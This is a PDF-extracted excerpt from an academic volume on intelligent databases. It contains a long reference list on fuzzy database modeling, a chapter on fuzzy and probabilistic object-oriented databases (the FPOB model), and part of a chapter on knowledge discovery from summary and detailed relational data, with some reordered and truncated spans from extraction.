Bahar, O. K., & Yazici, A. (2004). Normalization and lossless join decomposition of similaritybased fuzzy relational databases. International Journal of Intelligent Systems, 19, 885-917. Berzal, F., Marin, N., Pons, O., & Vila, M. A. (2004). A framework to build fuzzy object-oriented capabilities over an existing database system. In Advances in fuzzy object-oriented databases: Modeling and applications (pp. 177-205). Hershey, PA: Idea Group Publishing. Bhattacharjee, T. K., & Mazumdar, A. K. (1998). Axiomatisation of fuzzy multivalued dependencies in a fuzzy relational data model. Fuzzy Sets and Systems, 96(3), 343-352. Bhuniya, B., & Niyogi, P. (1993). Lossless join property in fuzzy relational databases. Data and Knowledge Engineering, 11(2), 109-124. Booch, G., Rumbaugh, J., & Jacobson, I. (1998). The unified modeling language user guide. Addison-Welsley Longman, Inc. Bordogna, G., & Pasi, G.. (2001). Graph-based interaction in a fuzzy object oriented database. International Journal of Intelligent Systems, 16(7), 821-841. Bordogna, G., Pasi, G., & Lucarella, D. (1999). A fuzzy object-oriented data model for managing vague and uncertain information. International Journal of Intelligent Systems, 14, 623-651. Bosc, P., Dubois, D., & Prade, H. (1998). Fuzzy functional dependencies and redundancy elimination, Journal of the American Society for Information Science, 49(3), 217-235. Bosc, P., & Lietard, L. (1996). Fuzzy integrals and database flexible querying. In Proceedings of
119
A Literature Overview of Fuzzy Database Modeling
the 5th IEEE International Conference on Fuzzy Systems (pp. 100-106). Bosc, P., & Pivert, O. (1992a). Fuzzy querying in conventional databases. In Fuzzy logic for management of uncertainty (pp. 645-671). John Wiley and Sons Inc. Bosc, P., & Pivert, O. (1992b). Some approaches for relational databases flexible querying. Journal of Intelligent Information Systems, 1, 323-354. Bosc, P., & Pivert, O. (1995). SQLf: A relational database language for fuzzy querying. IEEE Transactions on Fuzzy Systems, 3, 1-17. Bosc, P., & Pivert, O. (2003). On the impact of regular functional dependencies when moving to a possibilistic database framework. Fuzzy Sets and Systems, 140(1), 207-227. Boss, B., & Helmer, S. (1999). Index structures for efficiently accessing fuzzy data including cost models and measures. Fuzzy Sets and Systems, 108, 11-37. Buckles, B. P., & Petry, F. E. (1982). A fuzzy representation of data for relational database. Fuzzy Sets and Systems, 7(3), 213-226. Candan, K. S., & Li, W. (2001). On similarity measures for multimedia database applications. Knowledge and Information Systems, 3, 30-51. Cao, T. H., & Rossiter, J. M. (2003). A deductive probabilistic and fuzzy object-oriented database language. Fuzzy Sets and Systems, 140, 129150. Chang, C. S., & Chen, A. L. P. (1998). Efficient refinement of uncertain data by fuzzy integrity constraints. Information Sciences, 104(3-4), 191211. Chaudhry, N. A., Moyne, J. R., & Rundensteiner, E. A. (1999). An extended database design methodology for uncertain data management. Information Sciences, 121(1-2), 83-112.
120
Chen, G. Q. (1999). Fuzzy logic in data modeling; Semantics, constraints, and database design. Kluwer Academic Publisher. Chen G. Q., Kerre, E. E., & Vandenbulcke, J. (1995). The dependency-preserving decomposition and a testing algorithm in a fuzzy relational data model. Fuzzy Sets and Systems, 72(1), 2737. Chen, G. Q., & Kerre, E. E. (1998). Extending ER/EER concepts towards fuzzy conceptual data modeling. In Proceedings of the 1998 IEEE International Conference on Fuzzy Systems (Vol. 2, pp. 1320-1325). Chen, G. Q., Kerre, E. E., & Vandenbulcke, J. (1994). A computational algorithm for the FFD closure and a complete axiomatization of fuzzy functional dependency (FFD). International Journal of Intelligent Systems, 9, 421-439. Chen, G. Q., Kerre, E. E., & Vandenbulcke, J. (1996). Normalization based on functional dependency in a fuzzy relational data model. Information Systems, 21(3), 299-310. Chen, G. Q., Vandenbulcke, J., & Kerre, E. E. (1992). A general treatment of data redundancy in a fuzzy relational data model. Journal of the American Society of Information Science, 43(4), 304-311. Chen, P. P. (1976). The entity-relationship model: Toward a unified view of data. ACM Transactions on Database Systems, 1(1), 9-36. Chen, S. M., & Jong, W. T. (1997). Fuzzy query translation for relational database systems. IEEE Transactions on Systems, Man, and Cybernetics, 27, 714-721. Chen, Y. C., & Chen, S. M. (2000). Techniques of fuzzy query processing for fuzzy database systems. In Proceedings of the 5th Conference on Artificial Intelligence and Applications (pp. 361-368).
A Literature Overview of Fuzzy Database Modeling
Chiang, D. A., Lin, N. P., & Shis, C. C. (1998). Matching strengths of answers in fuzzy relational databases. IEEE Transactions on Systems, Man, and Cybernetics-Part C: Applications and Reviews, 28, 476-481. Cross, V. (2001). Fuzzy extensions for relationships in a generalized object model. International Journal of Intelligent Systems, 16(7), 843-861. Cross, V. (2003). Defining fuzzy relationships in object models: Abstraction and interpretation. Fuzzy Sets and Systems, 140, 5-27. Cross, V., Caluwe, R., & Van Gyseghem, N. (1997). A perspective from the fuzzy object data management group (FODMG). In Proceedings of the 1997 IEEE International Conference on Fuzzy Systems (Vol. 2, pp. 721-728). Cross, V., & Firat, A. (2000). Fuzzy objects for geographical information systems. Fuzzy Sets and Systems, 113, 19-36. Cubero, J. C., & Vila, M. A. (1994). A new definition of fuzzy functional dependency in fuzzy relational databases. International Journal of Intelligent Systems, 9(5), 441-448. Cubero, J. C., et al. (2004). Fuzzy object management in an object-relational framework. In Proceedings of the 2004 International Conference on Information Processing and Management of Uncertainty in Knowledge-Based Systems (pp. 1767-1774). de Tré, G., & de Caluwe, R. (2003). Level-2 fuzzy sets and their usefulness in object-oriented database modelling. Fuzzy Sets and Systems, 140(1), 29-49. Dubois, D., Prade, H., & Rossazza, J. P. (1991). Vagueness, typicality, and uncertainty in class hierarchies. International Journal of Intelligent Systems, 6, 167-183. Dubois, D., Prade, H., & Sedes, F. (2001). Fuzzy logic techniques in multimedia database querying:
A preliminary investigation of the potentials. IEEE transactions on Knowledge and Data Engineering, 13, 383-392. George, R., Srikanth, R., Petry, F. E., & Buckles, B. P. (1996). Uncertainty management issues in the object-oriented data model. IEEE Transactions on Fuzzy Systems, 4(2), 179-192. Helmer, S. (2003). Evaluating different approaches for indexing fuzzy sets. Fuzzy Sets and Systems, 140, 167-182. Helmer, S. (2004). Index structures for fuzzy object-oriented database systems. In Z. Ma (Ed.), Advances in Fuzzy Object-Oriented Databases: Modeling and Applications (pp. 206-240). Hershey, PA: Idea Group Publishing. Intan, R. & Mukaidono, M. (2000). Fuzzy functional dependency and its application to approximate data querying. In Proceedings of the 2000 International Database Engineering and Applications Symposium (pp. 47-54). Jyothi, S., & Babu, M. S. (1997). Multivalued dependencies in fuzzy relational databases and lossless join decomposition. Fuzzy Sets and Systems, 88(3), 315-332. Kacprzyk, J., Zadrozny, S., & Ziokkowski, A. (1987). FQUERY III+: A “human-consistent” database querying system based on fuzzy logic with linguistic quantifiers. In Proceedings of the 2nd International Fuzzy Systems Association Congress (pp. 443-453). Kamel, M., Hadfield, B., & Ismail, M. (1990). Fuzzy query processing using clustering techniques. Information Processing and Management, 26, 279-293. Kerre, E. E., & Chen, G. Q. (1995). An overview of fuzzy data modeling. In Fuzziness in Database Management Systems (pp. 23-41). Physica-Verlag.
121
A Literature Overview of Fuzzy Database Modeling
Koyuncu, M. & Yazici, A. (2003). IFOOD: An intelligent fuzzy object-oriented database architecture. IEEE Transactions on Knowledge and Data Engineering, 15(5), 1137-1154. Koyuncu, M., & Yazici, A. (2005). A fuzzy knowledge-based system for intelligent retrieval. IEEE Transactions on Fuzzy Sets and Systems, 13(3), 317-330.
Ma, Z. M. (2005b). A conceptual design methodology for fuzzy relational databases. Journal of Database Management, 16(2), 66-83. Ma, Z. M., & Mili, F. (2002a). Handling fuzzy information in extended possibility-based fuzzy relational databases. International Journal of Intelligent Systems, 17(10), 925-942.
Lee, J., Xue, N. L., Hsu, K. H., & Yang, S. J. H. (1999). Modeling imprecise requirements with fuzzy objects. Information Sciences, 118(1-4), 101-119.
Ma, Z. M., & Mili, F. (2002b). An extended possibility-based fuzzy nested relational database model and algebra. In IFIP International Federation for Information Processing (Vol. 221, pp. 285-288). Kluwer Academic Publishers.
Liao, S. Y., Wang, H. Q., & Liu, W. Y. (1999). Functional dependencies with null values, fuzzy values, and crisp values. IEEE Transactions on Fuzzy Systems, 7(1), 97-103.
Ma, Z. M., & Shen, D. R. (2006). Modeling fuzzy information in the IF2O and object-oriented data models. Journal of Intelligent and Fuzzy Systems (accepted).
Liu, W. Y. (1992). The reduction of the fuzzy data domain and fuzzy consistent join. Fuzzy Sets and Systems, 51(1), 89-96.
Ma, Z. M., Zhang, W. J., & Ma, W. Y. (2000). Semantic measure of fuzzy data in extended possibility-based fuzzy relational databases. International Journal of Intelligent Systems, 15(8), 705-716.
Liu, W. Y. (1993a). Extending the relational model to deal with fuzzy values. Fuzzy Sets and Systems, 60(2), 207-212. Liu, W. Y. (1993b). The fuzzy functional dependency on the basis of the semantic distance. Fuzzy Sets and Systems, 59, 173-179. Liu, W. Y. (1997). Fuzzy data dependencies and implication of fuzzy data dependencies. Fuzzy Sets and Systems, 92(3), 341-348. Ma, Z. M. (2004a). Advances in fuzzy objectoriented databases: Modeling and applications. Hershey, PA: Idea Group Publishing. Ma, Z. M. (2004b). Fuzzy information modeling with the UML. In Advances in Fuzzy Object-Oriented Databases: Modeling and Applications (pp. 163-176). Hershey, PA: Idea Group Publishing. Ma, Z. M. (2005a). Fuzzy database modeling with XML. Springer.
122
Ma, Z. M., Zhang, W. J., & Ma, W. Y. (2004). Extending object-oriented databases for fuzzy information modeling. Information Systems, 29(5), 421-435. Ma, Z. M., Zhang, W. J., Ma, W. Y., & Chen, G. Q. (2001). Conceptual design of fuzzy object-oriented databases utilizing extended entity-relationship model. International Journal of Intelligent Systems, 16(6), 697-711. Ma, Z. M., Zhang, W. J., Ma, W. Y., & Mili, F. (2002). Data dependencies in extended possibility-based fuzzy relational databases. International Journal of Intelligent Systems, 17(3), 321-332. Ma, Z. M., Zhang, W. J., & Mili, F. (2002). Fuzzy data compression based on data dependencies. International Journal of Intelligent Systems, 17(4), 409-426.
A Literature Overview of Fuzzy Database Modeling
Majumdar, A. K., Bhattacharya, I., & Saha, A. K. (2002). An object-oriented fuzzy data model for similarity detection in image databases. IEEE Transactions on Knowledge and Data Engineering, 14(5), 1186-1189.
Raju, K. V. S. V. N., & Majumdar, A. K. (1988). Fuzzy functional dependencies and lossless join decomposition of fuzzy relational database systems. ACM Transactions on Database Systems, 13(2), 129-166.
Marín, N., Medina, J. M., Pons, O., Sánchez, D., & Vila, M. A. (2003). Complex object comparison in a fuzzy context. Information and Software Technology, 45(7), 431-444.
Rundensteiner, E. A., Hawkes, L. W., & Bandler, W. (1989). On nearness measures in fuzzy relational data models. International Journal of Approximate Reasoning, 3, 267-98.
Marín, N., Pons, O., & Vila, M. A. (2001). A strategy for adding fuzzy types to an object-oriented database system. International Journal of Intelligent Systems, 16(7), 863-880.
Ruspini, E. (1986). Imprecision and uncertainty in the entity-relationship model. In Fuzzy logic in knowledge engineering (pp. 18-22). Verlag TUV Rheinland.
Marín, N., Vila, M. A., & Pons, O. (2000). Fuzzy types: A new concept of type for managing vague structures. International Journal of Intelligent Systems, 15, 1061-1085.
Saxena, P. C., & Tyagi, B. K. (1995). Fuzzy functional dependencies and independencies in extended fuzzy relational database models. Fuzzy Sets and Systems, 69, 65-89.
Medina, J. M., Pons, O., Cubero, J. C., & Vila, M. A. (1997). FREDDI: A fuzzy relational deductive database interface. International Journal of Intelligent Systems, 12(8), 597-613.
Shenoi, S., & Melton, A. (1989). Proximity relations in the fuzzy relational databases. Fuzzy Sets and Systems, 31(3), 285-296.
Medina, J. M., Vila, M. A., Cubero, J. C., & Pons, O. (1995). Towards the implementation of a generalized fuzzy relational database model. Fuzzy Sets and Systems, 75, 273-289. Ndouse, T. D. (1997). Intelligent systems modeling with reusable fuzzy objects. International Journal of Intelligent Systems, 12, 137-152. Parsons, S. (1996). Current approaches to handling imperfect information in data and knowledge bases. IEEE Transactions on Knowledge and Data Engineering, 8(2), 353-372. Petry, F. E. (1996). Fuzzy databases: Principles and applications. Kluwer Academic Publisher. Prade, H. & Testemale, C. (1984). Generalizing database relational algebra for the treatment of incomplete or uncertain information. Information Sciences, 34, 115-143.
Shenoi, S., & Melton, A. (1992). Functional dependencies and normal forms in the fuzzy relational database model. Information Sciences, 60, 1-28. Sicilia, M. A., Barriocanal, E. D., & Gutierrez, J. A. (2004). Introducing fuzziness in existing orthogonal persistence interfaces and systems. In Advances in fuzzy object-oriented databases: Modeling and applications (pp. 241-268). Hershey, PA: Idea Group Publishing. Sicilia, M. A., Garcia, E., Diaz, P., & Aedo, I. (2002). Extending relational data access programming libraries for fuzziness: The fJDBC framework (LNCS 2522, pp. 314-328). Sicilia, M. A., Garcia, E., & Gutierrez, J. A. (2002). Integrating fuzziness in object oriented modeling language: Towards a fuzzy-UML. In Proceedings of the 2002 International Conference on Fuzzy Sets Theory and Its Applications (pp. 66-67).
123
A Literature Overview of Fuzzy Database Modeling
Smets, P. (1997). Imperfect information: Imprecision-uncertainty. In Uncertainty management in information systems: From needs to solutions (pp. 225-254). Kluwer Academic Publishers.
notation to manage fuzzy datasets. In Proceedings of the 8th International Conference on Information Processing and Management of Uncertainty in Knowledge-Based Systems (pp. 1131-1138).
Sözat, M. I., & Yazici, A. (2001). A complete axiomatization for fuzzy functional and multivalued dependencies in fuzzy database relations. Fuzzy Sets and Systems, 117(2), 161-181.
Vila, M. A., Cubero, J. C., Medina, J. M., & Pons, O. (1996). A conceptual approach for deal with imprecision and uncertainty in object-based data models. International Journal of Intelligent Systems, 11, 791-806.
Takahashi, Y. (1991). A fuzzy query language for relational databases. IEEE Transactions on Systems, Man and Cybernetics, 21(6), 1576-1579. Takahashi, Y. (1993). Fuzzy database query languages and their relational completeness theorem. IEEE Transactions on Knowledge and Data Engineering, 5(1), 122-125. Tripathy, R. C., & Sakena, P. C. (1990). Multivalued dependencies in fuzzy relational databases. Fuzzy Sets and Systems, 38(3), 267-279. Umano, M., & Fukami, S. (1994). Fuzzy relational algebra for possibility-distribution-fuzzy-relational model of fuzzy data. Journal of Intelligent Information Systems, 3, 7-27. Umano, M., Imada, T., Hatono, I., & Tamura, H. (1998). Fuzzy object-oriented databases and implementation of its SQL-type data manipulation language. In Proceedings of the 1998 IEEE International Conference on Fuzzy Systems (Vol. 2, pp. 1344-1349). van Gyseghem, N. V., & de Caluwe, R. (1998). Imprecision and uncertainty in UFO database model. Journal of the American Society for Information Science, 49(3), 236-252. Vandenberghe, R. M. (1991). An extended entityrelationship model for fuzzy databases based on fuzzy truth values. In Proceedings of the 4th International Fuzzy Systems Association World Congress (pp. 280-283). Vert, G., Morris, A., Stock, M., & Jankowski, P. (2000). Extending entity-relationship modeling
124
Yang, Q., Zhang, W. N., Liu, C. W., Wu, J., Yu, C. T., Nakajima, H., & Rishe, N. (2001). Efficient processing of nested fuzzy SQL queries in a fuzzy database. IEEE Transactions on Knowledge and Data Engineering, 13(6), 884-901. Yazici, A., & Cibiceli, D. (1999). An access structure for similarity-based databases. Information Sciences, 115(1-4), 137-163. Yazici, A., & George, R. (1999). Fuzzy database modeling. Physica-Verlag. Yazici, A., & Koyuncu, M. (1997). Fuzzy objectoriented database modeling coupled with fuzzy logic. Fuzzy Sets and Systems, 89(1), 1-26. Yazici, A., & Sozat, M. I. (1998). The integrity constraints for similarity-based fuzzy relational databases. International Journal of Intelligent Systems, 13(7), 641-660. Yazici, A., Buckles, B. P., & Petry, F. E. (1992). A survey of conceptual and logical data models for uncertainty management. In Fuzzy logic for management of uncertainty (pp. 607-644). John Wiley and Sons Inc. Yazici, A., Buckles, B. P., & Petry, F. E. (1999). Handling complex and uncertain information in the ExIFO and NF2 data models. IEEE Transactions on Fuzzy Systems, 7(6), 659-676. Yazici, A., George, R., & Aksoy, D. (1998). Design and implementation issues in the fuzzy object-oriented data model. Information Sciences, 108(1-4), 241-260.
A Literature Overview of Fuzzy Database Modeling
Yazici, A., Ince, C., & Koyuncu, M. (2004). An indexing technique for similarity-based fuzzy object-oriented data model (LNAI 3055, pp. 334-347). Yazici, A., Soysal, A., Buckles, B. P., & Petry, F. E. (1999). Uncertainty in a nested relational database model. Data & Knowledge Engineering, 30(3), 275-301. Zadeh, L. A. (1965). Fuzzy sets. Information and Control, 8(3), 338-353.
Zadeh, L. A. (1978). Fuzzy sets as a basis for a theory of possibility. Fuzzy Sets and Systems, 1(1), 3-28. Zhang, W. N., & Wang, K. (2000). An efficient evaluation of a fuzzy equi-join using fuzzy equality indicators. IEEE Transactions on Knowledge and Data Engineering, 12(2), 225-237. Zvieli, A., & Chen, P. P. (1986). Entity-relationship modeling and fuzzy databases. In Proceedings of the 1986 IEEE International Conference on Data Engineering (pp. 320-327).
This work was previously published in Intelligent Databases: Technologies and Applications, edited by Z. Ma, pp. 167-196, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
125
126
Chapter 1.8
Fuzzy and Probabilistic Object-Oriented Databases Tru H. Cao Ho Chi Minh City University of Technology, Vietnam
INTRODUCTION
BACKGROUND
For modeling real-world problems and constructing intelligent systems, integration of different methodologies and techniques has been the quest and focus of significant interdisciplinary research effort. The advantages of such a hybrid system are that the strengths of its partners are combined and complementary to each other’s weakness. In particular, object orientation provides a hierarchical data abstraction scheme and a mechanism for information hiding and inheritance. However, the classical object-oriented data model cannot deal with uncertainty and imprecision pervasive in real world problems. Meanwhile, probability theory and fuzzy logic provide measures and rules for representing and reasoning with uncertainty and imprecision. That has led to intensive research and development of fuzzy and probabilistic object-oriented databases, as collectively reported in De Caluwe (1997), Ma (2005), and Marín & Vila (2007).
The key issues in research on extending the classical object-oriented data models to deal with uncertainty and imprecision are: 1. 2. 3. 4. 5. 6.
Modeling partial subclass relationship. Definition of partial class membership. Representation of uncertain and/or imprecise attribute values. Representation and execution of class methods. Expression of partial applicability of class properties. Mechanism for inheritance under uncertainty and imprecision.
In the classical object-oriented data model, a class hierarchy defines the subclass/super-class relation on classes. A class A is derived as a subclass of a class B, which is then called A’s superclass, either by narrowing the crisp value ranges of B’s attributes or by adding new properties to
B’s ones. In the probabilistic and fuzzy case, due to the uncertain applicability of class properties or the imprecision of attribute value ranges, the inclusion between classes naturally becomes graded, which could be computed on the basis of the value ranges of their common attributes (George & Buckles & Petry, 1993, Rossazza & Dubois & Prade, 1997). As discussed in Baldwin, Cao, Martin, and Rossiter (2000), a set of classes with a graded inclusion or inheritance relation actually forms a network rather than a hierarchy, because if a class A has some inclusion degree into a class B based on a fuzzy matching of their descriptions, then B usually also has some inclusion degree into A. Moreover, naturally, a concept is usually classified into sub-concepts that are totally subsumed by it, though the sub-concepts can overlap each other, as assumed in Dubitzky, Büchner, Hughes, and Bell (1999) for instance. Uncertain and imprecise attribute values lead to partial membership of an object into a class, and there are different measures proposed. Yazici and George (1999), for instance, defined for each class a membership function on a set of objects. Bordogna, Pasi, and Lucarella (1999) used linguistic labels to express the strength of the link of an object to a class. Dubitzky et al. (1999) defined membership as similarity degrees between objects and classes. Blanco, Marín, Pons, and Vila (2001) mentioned different measures, including probabilistic one, to be used for membership degrees. Nevertheless, it is to be answered how measures of different meanings, such as possibility and probability, on various levels of a model are integrated coherently. Most of the works on fuzzy object-oriented data models, which are referred in this paper, were mainly based on fuzzy set and possibility theories, and used fuzzy sets or possibility distributions to represent imprecise attribute values. Bordogna, Pasi, and Lucarella (1999) and Blanco et al. (2001) also modeled uncertainty about an attribute having a particular value. However,
much less concern was given for uncertainty over a set of values of an attribute and a foundation to combine probability degrees and fuzzy sets in the same model. While class attributes were paid much attention and treatment, class methods, as common in object-oriented systems for modeling object behaviors and parameterized properties, were often neglected. In Dubitzky et al. (1999) and Blanco et al. (2001) methods were not considered. Bordogna, Pasi, and Lucarella (1999) mentioned about methods but did not provide formal representation and explicit manipulation in their model. In Yazici (1999) and Cao and Rossiter (2003) methods were formally defined as Horn clauses and executed as a reasoning process, which were thus for declarative and deductive in contrast to imperative and procedural models. In the classical object-oriented data model, the properties that represent a class are necessary and sufficient to define the class. However, there is no commonly agreed set of defining properties for many natural, scientific, artificial, and ontological concepts. Arguing for flexible modeling, Van Gyseghem and De Caluwe (1997) introduced the notion of fuzzy property as an intermediate between the two extreme notions of required property and optional property, each of which was associated with a possibility degree of applicability of the property to the class. Meanwhile, Dubitzky et al. (1999) addressed the issue by contrasting the prototype concept model with the classical one, assuming each property of a concept to have a probability degree for it occurring in exemplars of that concept. We note the distinction between the notion of uncertain property values and that of uncertain property applicability. In the former case, an object surely has a particular property but it is not sure which one among a given set of values the property takes. Meanwhile, in the latter, it is even not sure if the object has that property. For example, “John owns a car whose brand is probably BMW” and “It is likely that John owns
127
Fuzzy and Probabilistic Object-Oriented Databases
a car” express different levels of uncertainty. In Bordogna, Pasi, and Lucarella (1999), Blanco et al. (2001), and Cao and Rossiter (2003), the two levels were mixed. Uncertain class membership and uncertain property applicability naturally result in uncertain inheritance of class properties. This was not considered in Bordogna, Pasi, and Lucarella (1999), Dubitzky et al. (1999), and Yazici and George (1999). In Blanco et al. (2001), class membership degrees were used as thresholds to determine what part of the properties in a class would be inherited. In Cao and Rossiter (2003), both membership of an object into a class and applicability of a property to the class were represented by support pairs (Baldwin, Lawry & Martin, 1996) and combined into the support pair for the object to inherit the property. Recently, Cross (2003) reviewed existing proposals and presented recommendations for the application of fuzzy set theory in a flexible generalized object model. Furthermore, De Tré and De Caluwe (2005) focused on representing data as constraints on object attributes and query answering as constraint satisfaction. For realization of fuzzy object-oriented data models, Berzal et al. (2005) were concerned with implementation of their model on an existing platform. Meanwhile, Fril++, a fuzzy object-oriented logic programming language, was also developed in Rossiter and Cao (2005). While the fuzzy object-oriented data models referred in this paper were mainly based on fuzzy set and possibility theories, Eiter, Lu, Lukasiewicz, and Subrahmanian (2001) introduced a probabilistic model to handle object bases with uncertainty, called POB (Probabilistic Object Base). For a POB class hierarchy, although a class was assumed to be fully included in its super-classes, the model specified the conditional probability for an object of a class belonging to each of its subclasses. Intuitively, it specified how likely an object of a class belonged to a subclass of that class. Accordingly, the partial class membership
128
was measured by probability degrees. For each attribute of an object, uncertainty about its value was represented by lower bound and upper bound probability distributions on a set of values. The authors also developed a full-fledged algebra to query and operate on object bases. However, the two major shortcomings of the POB model are: (1) it does not allow imprecise attribute values; and (2) it does not consider class methods. For instance, in the Plant example therein, the values of the attribute sun light are chosen to be only enumerated symbols such as mild, medium, and heavy without any interpretation. Meanwhile, in practice, those linguistic values are inherently vague and imprecise over degrees of sun light. Moreover, without an interpretation, they cannot be measured and their probability distributions cannot be calculated.
A HYBRID MODEL In Cao and Nguyen (2007) and Nguyen and Cao (2007), POB is extended with fuzzy attribute values, class methods, and uncertain applicability of class properties. Here, the term property is used to subsume both the terms attribute and method. This hybrid model is called FPOB (FuzzyProbabilistic Object Base). Figure 1 is an FPOB hierarchy of patients, who are classified as being children, teenagers or adults and, alternatively, as being out-patients, or in-patients. Those subclasses of a class that are connected to a d node are mutually disjoint, and they form a cluster of that class. The value in [0, 1] associated with the link between a class and one of its immediate subclasses represents the probability for an object of the class belonging to that subclass. For instance, the hierarchy says 80% of patients are non-resident, while the rest 20% are resident. As such, each object could be a member of a class with some probability. Basically, imprecise and uncertain values of an attribute is expressed by a fuzzy-probabilistic
Fuzzy and Probabilistic Object-Oriented Databases
Figure 1. An example FPOB class hierarchy PATIENT
d
d 0.2
0.8 OUT_PATIENT
0.2
IN_PATIENT
0.8 OUT_TEENAGER
triple of the form 〈V, α, β〉, where V is a set of fuzzy values, that is,, those defined by fuzzy sets, and α and β are lower and upper bound probability distributions on V. For example, 〈{young, middle_aged}, .8u, 1.2u〉, represents that the probability for the age of a patient is young or middle-aged is between 0.4 and 0.6, where young and middle-aged are linguistic labels of fuzzy sets, and u denotes the uniform distribution. For a unified treatment of class attributes and methods, an attribute could be considered as a special method with a fixed output, having no input argument. Alternatively, a method could be considered as a parameterized attribute, whose value depends on its input arguments. In other words, a method is a function from products of fuzzy-probabilistic triples to fuzzy-probabilistic triples. For example, a method could be define for the class PATIENT to compute the total treatment cost of a patient, depending on the daily treatment cost, the patient’s treatment duration, and insurance cover. Uncertain applicability of a class property in FPOB is expressed by a probability interval. For example, since not all patients may have a medical history recorded, that property might be defined with the interval [.8, 1] saying that at least 80% of patients have medical histories. For computation, a property value 〈V, α, β〉 associated with a probability interval [l, u] is assumed to be equivalent to the fuzzy-probabilistic triple
0.4 CHILD
0.2 TEENAGER
0.6
0.4 ADULT
0.3
IN_ADULT
〈V, α⊗l, β⊗u〉, where ⊗ denotes a probabilistic conjunction operator (Lakshmanan et al., 1997, Ross & Subrahmanian, 2005). Let [l, u] be the applicability probability interval of a property P to a class c, and [x, y] be the membership probability interval of an object o into c. Then the applicability probability interval of P to o is defined to be [l, u] ⊗ [x, y]. For multiple uncertain inheritance, in the logic-based fuzzy and probabilistic object-oriented model in Cao (2001), each uncertainly applicable property was considered as a defeasible probabilistic logic rule, and then uncertain inheritance was resolved by probabilistic default reasoning. In FPOB, complex object structures, or types, can be recursively defined to be of the form τ = [P1(τ11,…, τ1n ): τ1[l1, u1],…, Pk (τk1,…, τkn ): τk[lk, 1 k uk]]. For each property Pi, τi and τij’s ( j from 1 to ni) are respectively the types of its output and input parameters, and [li, ui] is the applicability probability interval of the property to the class in which it is defined. Simple types are atomic types like real numbers and strings, or fuzzy sets on atomic types. Since complex object types can be so nested, one has the notion of path expressions. In particular, Pi is a path expression for the type τ aforementioned, and [li, ui] is its associated probability interval. Pi[li, ui] is called an uncertain path expression. Inductively, if λi is a path expression for τi with associated probability interval [lλ , uλ ], i
i
129
Fuzzy and Probabilistic Object-Oriented Databases
then Pi.λi is a path expression for τ, and [li, ui] ⊗ [lλ , uλ ] is its associated probability interval. i i For a particular object, a fuzzy-probabilistic tuple value of the type τ is [P1(〈V11, α11, β11〉, …, 〈V1n , α1n , β1n 〉): 〈V1, α1, β1〉[l’1, u’1], …, Pk (〈V k1, αk1, 1 1 1 βk1〉, …, 〈V kn , αkn , βkn 〉): 〈V k, αk, βk〉[l’ k, u’ k]], where k k k 〈Vi, αi, βi〉 and 〈Vij, αij, βij〉 are fuzzy-probabilistic triples of types τi and τij, (i from 1 to k and j from 1 to ni). Here, [l’ i, u’ i] specifies the uncertain applicability of Pi to that particular object, which is not necessarily the same as the default value [li, ui] for a generic object of the type τ. The most important database operation is selection. For FPOB, a fuzzy-probabilistic selection expression is inductively defined to be in one of the following forms: 1.
2.
3.
4.
5.
130
x ∈ c, where x is an object variable and c is a class. This is to select those objects that belong to the class c. x.λ, where x is an object variable and λ is a path expression. This is to select those objects to which the path expression λ is applicable. x.λ θ v, where x is an object variable, λ is a path expression, θ is a binary relation from {=, ≠, ≤, 5000 Then Profitable=Yes CF=100%
Incorrect Knowledge Discovery from Detailed Data
The results indicate that blue products in larger stores are profitable; however, they do not tell us the amounts of the profits which can go one way or another. Now, consider Table 2, where the third row in Table 1 is changed. Rules 1 and 2 are also true in Table 2. That is, from a probability point of view, Tables 1 and 2 produce the same results. However, this is not true when we look at the summary Tables 3 and 4, which are the summary tables based on Tables 1 and 2, respectively. Table 3 tells us that Blue color product is profitable and
In general, summary data (aggregation) is never found in the operational environment. Without discovery process on summary data, we may discover incorrect knowledge from detailed operational data. Discovering a rule based just on current detail data may not depict the actual trends on data. The problem is that statistical significance is usually used in determining the
244
Discovering Quality Knowledge from Relational Databases
Table 1. Sample sales data Product Jacket Jacket Jacket Hat Hat Hat Glove Glove Glove
Product Color Blue Blue Blue Green Green Green Green Blue Green
Table 4. Summary sales table based on Table 2 Product Color Blue Green
Profit -500 1000
245
Discovering Quality Knowledge from Relational Databases
Table 4 tells us it is not. That is, in the summary tables, the probability behavior of these detailed tables begins to diverge and thus produces different results. We should be careful when we analyze the summary tables since we may get conflicting results when the discovered patterns from the summary tables are compared with the discovered patterns from detailed tables. In general, the probabilities are not enough when discovering knowledge from detailed data. We need summary data as well.
Incorrect Knowledge Discovery from Summary Data In knowledge discovery, we believe that it is critical to use summary tables to discover patterns that could not be otherwise discovered from operational detailed databases. Knowledge discovery on detailed data is based on statistical significance (uses probability), which may not detect all patterns, or may produce incorrect results as we noted in the previous section. Knowledge discovery on summary tables could improve the overall data mining process and prevent incorrect knowledge discovery. Summary tables have hidden patterns that can be discovered. For example, Table 3 tells us that Blue products are profitable. Such discovered patterns can complement the discoveries from the detailed data (as part of the validation of the discovered knowledge, explained later). In general, for any given detailed data, there are numerous ways to summarize them. Each summarization or aggregation can be along one or more dimensions, as shown in the Tables 3 and 4. Accurate knowledge, however, cannot be discovered just by processing the summary tables. The problem is that the summarization of the same dataset with two summarization methods may result in the same result, and the summarization of the same dataset with two methods may produce two different results. Therefore, it is extremely important that the users be able to access metadata (Adriaans & Zantinge, 1996) that tells
246
them exactly how each type of summarized data was derived, so they understand which dimensions have been summarized and to what level. Otherwise, we may discover inaccurate patterns from different summarized tables. For example, consider Tables 5 through 7, summarized/aggregated tables based on Table 1, which provide different and conflicting results. These tables show different results for Green Hat product. In fact, it is the Green Hat in small stores (Store Size 1000) that loses money. This fact can only be discovered by looking the different summary tables and knowing how they are created (i.e., using the metadata to see the SQL statements used to create the summarized/aggregated tables). Alternatively, we can combine the patterns discovered from the detailed data and the summary data to avoid discovering contradictory knowledge (as explained in the following discussion). As we noted, summary tables greatly enhance the performance of information retrieval in a large volume database environment (Barquin & Edelstein, 1997). There are, however, several problems associated with creating and maintaining the summary tables. First, in most databases, it is physically impossible to create all the summary tables required to support all possible queries. For the general case, given N items (or columns) on an axis of a cross-tabular report, there are 2 N-1 possible ways of combining the items. The number of aggregate rows required depends on the number of valid combinations of item values, and the situation is complicated further when the items are in a multilevel hierarchy (i.e., with Month rolling up to Quarter and Year). However, there are pruning techniques that can be employed. For example, by specifying which combinations of dimensions or levels do not make business sense to combine (using metadata and available domain knowledge gathered from domain expert), and by not aggregating at all levels, allowing some minimal aggregation from a lower level, where required.
Discovering Quality Knowledge from Relational Databases
